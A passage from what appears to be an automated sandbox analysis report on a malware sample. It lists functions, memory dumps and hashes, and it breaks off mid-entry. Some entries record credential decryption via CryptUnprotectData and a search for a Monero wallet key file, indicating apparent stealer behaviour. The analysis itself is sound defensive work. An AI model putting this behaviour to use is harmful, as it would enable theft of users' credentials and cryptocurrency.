                  • Instruction Fuzzy Hash: 4D8209F3A082109FE304AE2DEC8576AFBE5EFD4720F1A853DEAC4C7744E53598058696
                  Function 004FE6A1 Relevance: 4.9, Strings: 3, Instructions: 1162COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Ro|$t>X$t>X
                  • API String ID: 0-2328115121
                  • Opcode ID: 3431ca54d3c10f186f705cbd2af15293ac51e66b9ca96d85755a7c901874f8e7
                  • Instruction ID: 73d4cb15fa8c14beea750ee5d2bbdc979ed3c8a1af4e71fde32cb6f348990d10
                  • Opcode Fuzzy Hash: 3431ca54d3c10f186f705cbd2af15293ac51e66b9ca96d85755a7c901874f8e7
                  • Instruction Fuzzy Hash: 0882E5F360C2009FE308AF69DC8567ABBE5EF94720F1A492DE6C5C3744EA3598418797
                  Function 00143720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                  Download Yara Rule
                  APIs
                  • CoCreateInstance.COMBASE(0014E118,00000000,00000001,0014E108,00000000), ref: 00143758
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 001437B0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharCreateInstanceMultiWide
                  • String ID:
                  • API String ID: 123533781-0
                  • Opcode ID: ca51070564081c1a1e81eb335e940d996e1eded94651f6c5cde4d39b8e9f8aa7
                  • Instruction ID: 6c8196a629642502258e9ba181180ff7563fd674e039065efd7af3ba0706cdb4
                  • Opcode Fuzzy Hash: ca51070564081c1a1e81eb335e940d996e1eded94651f6c5cde4d39b8e9f8aa7
                  • Instruction Fuzzy Hash: 1941E970A40A289FDB24DB58CC95B9BB7B5BB48702F5042D8E618E72E0D771AEC5CF50
                  Function 00139B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00139B84
                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00139BA3
                  • LocalFree.KERNEL32(?), ref: 00139BD3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$AllocCryptDataFreeUnprotect
                  • String ID:
                  • API String ID: 2068576380-0
                  • Opcode ID: 121068b82d1a7d7ff80d21155a24afa0ceef0a198892063d347e31446d5cbaaf
                  • Instruction ID: c2b7ee29f8d015e938abbdb8dc7e807aeb9c318624daf0229b728671132cc5fc
                  • Opcode Fuzzy Hash: 121068b82d1a7d7ff80d21155a24afa0ceef0a198892063d347e31446d5cbaaf
                  • Instruction Fuzzy Hash: 0C1109B8A00209EFCB05DF94D985EAEB7B9FF88300F104598E915A7394D770AE50CFA1
                  Function 00503A91 Relevance: 3.4, Strings: 2, Instructions: 888COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Pqo${W^T
                  • API String ID: 0-4049201387
                  • Opcode ID: a4b0f3c16eb10d95f0ae965297912e50b53869b533e6b753f6775db82d6b90eb
                  • Instruction ID: 683cc6d3e3c39336f60eb32372bd34bd1e13a64fb83717d50fe7c068e5c705a2
                  • Opcode Fuzzy Hash: a4b0f3c16eb10d95f0ae965297912e50b53869b533e6b753f6775db82d6b90eb
                  • Instruction Fuzzy Hash: A15216F350C2009FD308AF29EC8567AFBE5EF94760F1A492DEAC587344EA3598058787
                  Function 0013F68A Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001515B8,00150D96), ref: 0013F71E
                  • StrCmpCA.SHLWAPI(?,001515BC), ref: 0013F76F
                  • StrCmpCA.SHLWAPI(?,001515C0), ref: 0013F785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0013FAB1
                  • FindClose.KERNEL32(000000FF), ref: 0013FAC3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: c51412134c160f36cda841a37ecf59774b01d78370b882f65ec67c2f568080c3
                  • Instruction ID: 6cfcc4915364939178910a48b6a0882ab03625c925dc44f6f87250290f38b294
                  • Opcode Fuzzy Hash: c51412134c160f36cda841a37ecf59774b01d78370b882f65ec67c2f568080c3
                  • Instruction Fuzzy Hash: F1119D7188410DABEB14FBB0DC559DD7378EF21301F924669A51A570A2EF30274AC752
                  Function 004135AA Relevance: 1.4, Strings: 1, Instructions: 193COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: G\L
                  • API String ID: 0-4220368099
                  • Opcode ID: 4126c48baf1d332ef91d311fc9267b8743320364c3f50e4576d1420ff71ae02c
                  • Instruction ID: ebd462083a6bae02d75d43b79847451b5ddb4b017a296f6fb7fe5f246c1b6349
                  • Opcode Fuzzy Hash: 4126c48baf1d332ef91d311fc9267b8743320364c3f50e4576d1420ff71ae02c
                  • Instruction Fuzzy Hash: 72510BF3A482009FE3486E28DC95779F7D5EF94320F1B453DDACA87780EA3A58158752
                  Function 00471D9F Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Oo/
                  • API String ID: 0-3685457274
                  • Opcode ID: 657c488bd6db85cb6d4f1ea72608ac2faa3f6195abd9a13e899c68a9d97153b6
                  • Instruction ID: 9225ebbfce6614ca5c143ed3747eeedae6aa25a68905b048fcf6e4d65e663816
                  • Opcode Fuzzy Hash: 657c488bd6db85cb6d4f1ea72608ac2faa3f6195abd9a13e899c68a9d97153b6
                  • Instruction Fuzzy Hash: 484129F3A082045FE708AA28EC9176BB7D9EB94320F19853DEA85C7344ED3859054796
                  Function 004DE998 Relevance: .2, Instructions: 205COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3ad9603f199ea959aab18ab773eddbee3ff8641cdddb3035e09f74dcdf47f02c
                  • Instruction ID: 243786856aebeb454b58d92e997ba59c98af2d8d6f1b2e4c79e367ab40962c68
                  • Opcode Fuzzy Hash: 3ad9603f199ea959aab18ab773eddbee3ff8641cdddb3035e09f74dcdf47f02c
                  • Instruction Fuzzy Hash: 6351D3F3A086109FE7186E29DC8577ABBE6EFD4720F07453DEAC887780E93458418696
                  Function 003DAAB9 Relevance: .2, Instructions: 177COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 48c0d6e74df1e7dc1d31371e765ac1f9601b2751a8c37e10761087c30fd1fb59
                  • Instruction ID: c45c774681d1529d8e951da01d0a883daa908f4620287aaf47da92b268a0776f
                  • Opcode Fuzzy Hash: 48c0d6e74df1e7dc1d31371e765ac1f9601b2751a8c37e10761087c30fd1fb59
                  • Instruction Fuzzy Hash: 9951D5F3F085105BF3089E29DC9177AB7D6EBD4320F1A863DE789933C0E93958058696
                  Function 0059897F Relevance: .1, Instructions: 105COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 39ae196360d6969296514edbff6fe186bc12f14404f0737a58c9652925346567
                  • Instruction ID: 96096c97bdcf0d77992da3472669ec1db807c5036e926a828348d6fc7706cc0f
                  • Opcode Fuzzy Hash: 39ae196360d6969296514edbff6fe186bc12f14404f0737a58c9652925346567
                  • Instruction Fuzzy Hash: 27316BB291C3009FE345AE29DC826BAFBE5EF98720F12492DE6C5D3610E67158418A97
                  Function 0052DBE3 Relevance: .1, Instructions: 97COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8a47df607ea7f30447caf2267cc655cf971989726512bf069add36bccd12e090
                  • Instruction ID: bf4c586a39a37e90d176b95cc493bdb4fa66becf7944375d988bb2300d991420
                  • Opcode Fuzzy Hash: 8a47df607ea7f30447caf2267cc655cf971989726512bf069add36bccd12e090
                  • Instruction Fuzzy Hash: 52210873D0C030DBD3199919DC1167AFBA5EF95310F22892DD9D667384E9751C1186E2
                  Function 0059EA28 Relevance: .1, Instructions: 85COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
